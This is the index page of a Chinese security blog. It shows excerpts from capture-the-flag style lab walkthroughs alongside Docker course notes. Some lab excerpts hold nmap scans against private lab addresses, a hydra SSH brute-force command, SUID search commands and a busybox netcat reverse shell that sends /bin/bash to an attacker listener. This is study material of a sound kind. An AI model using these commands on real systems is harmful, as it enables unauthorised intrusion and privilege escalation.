肿眼泡の小站

肿眼泡の小站

群友靶机-Low-Plugin
发表于2025-07-29|靶机群友靶机7月
群友靶机-low-Plugin1 信息收集1.1 Nmap123456Not shown: 65533 closed tcp ports (reset)PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)80/tcp open http Apache httpd 2.4.62 ((Debian))MAC Address: 08:00:27:A2:03:15 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 1.2 Dirsearch123456Target: http://192.168.1.147/[16:09:34] 200 - 1KB - /about.php[16:09:37] 200 - 2KB - /feedback.php[16:09:37] 200 - 2KB - /home.php[...
Docker知识点汇总(上)
发表于2025-07-23|Docker
Docker 知识点汇总(上)前言!!本教程所使用Linux系统为:openEuler-24.03 !! 最近,听说学弟学妹们开始做docker的课程设计了,当然作为学长肯定得多关心学弟学妹,让学弟学妹们做上更有难度的课程设计,于是在老师手头上接下了辅导学弟学妹做课程设计的任务,所以就诞生了这篇课件;因为之前没接过这种活,所以各位大佬喷的时候轻点喷 1、准备 Linux 环境1.1.安装 VMware1.2.创建虚拟机1.3.安装CentOS7(Linux)详细安装教程(手把手图文详解版)-CSDN博客 2、SSH 连接2.1 SSH客户端2.1.1 XTerminal下载地址:Xterminal - 更好用的开发工具,但不止于(SSH/控制台/More) 2.1.2 mobaxterm下载链接:学校alist服务器(10.22.108.10:5244) 2.1.3 xshell/xftp下载地址:家庭/学校免费 - NetSarang Website 2.2 XTerminal配置 3、Linux基础语法1cd /etc/sys...
群友靶机-low-Base
发表于2025-07-23|靶机群友靶机7月
群友靶机-low-Base1 信息收集1.1 nmap1234567891011121314┌──(root㉿kali)-[~/桌面]└─# nmap 192.168.198.229 -p- -sV Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-23 10:19 EDTNmap scan report for 192.168.198.229Host is up (0.00034s latency).Not shown: 65533 closed tcp ports (reset)PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)80/tcp open http Apache httpd 2.4.62 ((Debian))MAC Address: 08:00:27:3D:1A:5F (PCS Systemtechnik/Oracle VirtualBox vir...
群友靶机-Easy-Sneak
发表于2025-07-23|靶机群友靶机7月
群友靶机-Easy-Sneak这回也是罕见的写出了群里大佬的靶机 (虽然和其他师傅交流了下) 当时写的时候因为是和其他师傅交流的,也是比较乱,所以这里写个文档理理思路 信息收集Nmap Dirsearch User访问下来感觉找到的只有 http://192.168.198.250/cms/license.txt http://192.168.198.250/cms/install/login.php http://192.168.198.250/cms/.gitignore 倒是这个登录窗口怎么爆破都没消息 其他目录全部找了一遍,啥也没有 那没办法,只感觉这个license.txt有一点想法 最开始试的时候倒是试了好久,因为第一行是逆序的,然后到二行也是逆序的,于是尝试将整个密钥全部逆序,但是第二行和最后一行又是正序的,所以全部逆又感觉不对劲,这个时候又想起来题目sneak(🐍)那可能就是要绕,那就试着绕一下,发现突然就绕通了(也是猜到了) Python 脚本 123456789101112131415161718192021222324252627282930313...
群友靶机-Easy-change
发表于2025-07-23|靶机群友靶机7月
群友靶机-Easy-change1 信息收集12345678910111213141516┌──(root㉿kali)-[~]└─# nmap 10.22.23.140 -p- -sVStarting Nmap 7.95 ( https://nmap.org ) at 2025-07-21 04:56 EDTNmap scan report for 10.22.23.140Host is up (0.00034s latency).Not shown: 65532 closed tcp ports (reset)PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)80/tcp open http Apache httpd 2.4.62 ((Debian))3306/tcp open mysql MariaDB 5.5.5-10.5.23MAC Address: 08:00:27:DC:2C:17 (PCS Systemt...
群友靶机-Low-5ud0
发表于2025-07-23|靶机群友靶机7月
群友靶机-low-5ud0信息收集 Userhttp://192.168.198.190/textpattern/index.php 用dirsearch能扫到后台地址 访问后是个登录窗口 直接开爆 之后就能够在这个接口上找到非常朴实无华的文件上传 路径的话当时扫目录的时候扫到了一个/files,拼接一下也好猜 或者直接去搜nday也行 Root然后kali 开 nc监听下 1nc -lvp 1234 1busybox nc 192.168.198.191 1234 -e /bin/bash 拿下www后,因为这里能直接看user的flag,感觉关键点应该不再另外一个用户上 同时结合题目 5ud0 也不难猜出关键点是 sudo find看下有啥可用的 123find / -user root -perm -4000 -print 2>/dev/nullfind / -perm -u=s -type f 2>/dev/nullfind / -user root -perm -4000 -exec ls -ldb {} \; 因为题目...
群友靶机-Low-sky
发表于2025-07-23|靶机群友靶机7月
群友靶机-Low-28-sky信息收集Nmap1234567Host is up (0.00052s latency).Not shown: 65533 closed tcp ports (reset)PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)80/tcp open http Apache httpd 2.4.62 ((Debian))MAC Address: 08:00:27:07:09:C0 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Dirsearch12345678910Target: http://192.168.1.148/[19:16:59] Scanning:[19:17:03] 200 - 63B - /check.php[19:17:05...
群友靶机-Low-Paste
发表于2025-07-23|靶机群友靶机7月
群友靶机-low-Paste信息收集 User01_FTP我们首先尝试访问 FTP 1ftp 10.22.23.149 发现直接泄露了一组账号密码 guest:guest 但是guest权限过低,没法上传和修改文件 然后突然间发现,guest:guest 这个账号竟然能够连上 ssh!!! 但是在guest界面没有看到flag,那接下来肯定是要进film的 然后就开始到处翻,倒是啥也没看到 02_Web这个时候发现好像从到到尾没怎么注意过 web 端 于是回过头去看web端 Web端是一个密码生成器,在主界面点击生成和复制后,会将密码生成至 /password.log 处 那既然是密码生成器,反正又找不到其他东西,那就试试 film 的密码是不是这个 然后就登上了。。。 1ssh film@10.22.23.149 1flag{user-f307bc02d0f7e60e52d128a0c27b8e34} Root先 sudo -l 看看有啥能用的 1sudo -l 发现 paste 能用 去 GTFOBins 搜搜看...
Vulnvm-easy-aspie
发表于2025-07-23|靶机Vulnvm
Vulnvm-Easy-aspie先查找ip 1arp-scan -l 进行端口扫描 1nmap -sS -p- 192.168.220.144 发现 80、22端口 进入80端口,发现位默认界面 使用dirsearch进行扫描 访问 注意到Alex 哪就用这个名字爆破看看 1hydra -l alex -P ./password.lst ssh://192.168.220.144 -V -I -e nsr 之前一直是听说,没有实际使用过 这里对各个参数详细解释下 参数 介绍-h 查看帮助菜单。-R 继续从上一次进度接着破解。-S 采用SSL链接。-s PORT 可通过这个参数指定非默认端口。-l LOGIN 指定破解的用户,对特定用户破解。-L FILE 指定用户名字典。-p PASS 小写,指定密码破解,少用,一般是采用密码字典。-P FILE 大写,指定密码字典。-e ns 可选选项,n:空密码试探,s:使用指定用户和密码试探。-C FILE 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数。-M FILE 指定目标列表文件一行一条。-o ...
Docker知识点汇总(下)
发表于2025-06-21|Docker
Docker 知识点汇总 (下)8、Docker文件挂载8.1 数据卷挂载8.1.1 数据卷数据卷作为一个虚拟目录,是容器内目录与宿主机目录之间映射的桥梁,它能够将宿主机目录映射到容器内目录,方便我们操作容器内文件,或者方便迁移容器产生的数据 8.1.2 数据卷命令 命令 说明 文档地址 docker volume create 创建数据卷 docker volume create docker volume ls 查看所有数据卷 docker volume ls docker volume rm 删除指定数据卷 docker volume rm docker volume inspect 查看某个数据卷的详情 docker volume inspect docker volume prune 清除数据卷 docker volume prune 12345678910111213141516root@gzctf:/home/gzctf# docker volume -hFlag shorthand -h has been deprecated, p...
avatar
p3ngtop
文章
10
标签
15
分类
5
Follow Me
公告
This is my Blog
最新文章
群友靶机-Low-Plugin2025-07-29
Docker知识点汇总(上)2025-07-23
群友靶机-low-Base2025-07-23
群友靶机-Easy-Sneak2025-07-23
群友靶机-Easy-change2025-07-23
分类
  • Docker2
  • 靶机8
    • Vulnvm1
    • 群友靶机7
      • 7月7
标签
爆破ssh Easy Docker 王炸提权 Sudo-Sudo提权 Sudo-ffmpeg提权 群友靶机 Sudo-git_dumper提权 Sudo—Paste 用户组权限 基础知识 Vulnvm more提权 靶机 Low
归档
  • 七月 2025 9
  • 六月 2025 1
网站信息
文章数目 :
10
本站访客数 :
本站总浏览量 :
最后更新时间 :
©2025 By p3ngtop框架 Hexo 7.3.0|主题 Butterfly 5.4.2
湘ICP备2025131894号-1